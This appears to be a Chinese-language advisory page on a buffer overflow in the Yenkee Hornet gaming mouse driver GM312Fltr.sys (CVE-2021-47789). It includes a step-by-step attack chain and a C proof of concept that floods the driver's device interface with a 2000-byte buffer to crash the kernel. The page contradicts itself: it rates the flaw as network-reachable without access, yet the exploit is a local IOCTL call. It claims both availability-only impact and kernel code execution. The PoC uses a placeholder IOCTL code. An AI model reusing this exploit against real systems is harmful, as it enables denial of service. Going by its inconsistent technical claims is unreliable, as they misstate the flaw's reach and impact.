CVE-2021-47789 Yenkee Hornet游戏鼠标驱动缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2021-47789

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Yenkee Hornet Gaming Mouse GM312Fltr.sys驱动程序

漏洞概述

CVE-2021-47789是Yenkee Hornet Gaming Mouse（黄蜂游戏鼠标）驱动程序GM312Fltr.sys中存在的缓冲区溢出漏洞。该漏洞允许未经认证的攻击者通过发送特制的超大输入数据，导致内核级系统崩溃。CVSS 3.1评分7.5，属于高危漏洞。攻击者无需任何权限或用户交互，即可通过网络远程触发此漏洞。此漏洞影响可用性，导致系统拒绝服务。Yenkee是一家专注于游戏外设的厂商，其鼠标驱动程序存在严重的安全缺陷，攻击者可以利用此漏洞在受害系统上实现内核级代码执行或系统完全崩溃。

技术细节

漏洞存在于Yenkee Hornet Gaming Mouse的驱动程序GM312Fltr.sys中，该驱动程序负责处理与鼠标硬件的通信。驱动程序在处理DeviceIoControl请求时，未对输入缓冲区大小进行充分验证。当攻击者向驱动程序发送超过预期大小的数据（特别是约2000字节的缓冲区）时，会触发缓冲区溢出条件，导致内核内存损坏。

利用方式：攻击者构造一个包含2000字节数据的DeviceIoControl请求，直接发送到\\\\.\\GM312Fltr设备接口。驱动程序将恶意数据复制到固定大小的缓冲区中，由于缺乏边界检查，超出部分覆盖相邻内核内存区域。这种内存损坏会导致系统崩溃（BSOD）或可能被利用执行任意内核代码。

漏洞影响系统的可用性（Availability），CVSS向量AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H表明攻击复杂度低且无需认证或用户交互即可实施攻击。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统上运行的Yenkee Hornet Gaming Mouse驱动程序GM312Fltr.sys

STEP 2

步骤2

攻击者构造包含2000字节数据的恶意DeviceIoControl请求

STEP 3

步骤3

通过\\\\.\\GM312Fltr设备接口发送特制请求到驱动程序

STEP 4

步骤4

驱动程序处理请求时缺乏边界检查，将超长数据写入固定大小缓冲区

STEP 5

步骤5

缓冲区溢出导致内核内存损坏，触发系统崩溃（BSOD）

STEP 6

步骤6

系统可用性受损，发生拒绝服务，攻击成功

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <windows.h>
#include <stdio.h>

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    DWORD bufferSize = 2000;
    PBYTE buffer = (PBYTE)malloc(bufferSize);
    
    // Fill buffer with pattern
    memset(buffer, 0x41, bufferSize);
    
    // Open device handle
    hDevice = CreateFileA("\\\\.\\GM312Fltr",
                          GENERIC_READ | GENERIC_WRITE,
                          FILE_SHARE_READ | FILE_SHARE_WRITE,
                          NULL,
                          OPEN_EXISTING,
                          FILE_ATTRIBUTE_NORMAL,
                          NULL);
    
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device. Error: %d\n", GetLastError());
        return -1;
    }
    
    printf("[+] Device handle opened successfully\n");
    printf("[+] Sending %d byte buffer to trigger overflow...\n", bufferSize);
    
    // Send malicious input to trigger buffer overflow
    BOOL result = DeviceIoControl(hDevice,
                                  0xdeadbeef,  // IOCTL code
                                  buffer,
                                  bufferSize,
                                  NULL,
                                  0,
                                  &bytesReturned,
                                  NULL);
    
    if (!result) {
        printf("[+] Overflow triggered! System should crash.\n");
    }
    
    CloseHandle(hDevice);
    free(buffer);
    return 0;
}

影响范围

Yenkee Hornet Gaming Mouse GM312Fltr.sys驱动程序（所有已知版本）

防御指南

临时缓解措施

由于这是硬件驱动程序漏洞，建议采取以下临时缓解措施：1) 识别并断开受影响Yenkee Hornet Gaming Mouse设备；2) 禁用或移除有漏洞的驱动程序；3) 监控网络和系统日志中的异常DeviceIoControl活动；4) 在边界防火墙上实施访问控制，阻止对目标系统的未授权访问；5) 考虑使用虚拟化技术隔离受影响系统。长期解决方案需等待厂商发布安全补丁更新驱动程序。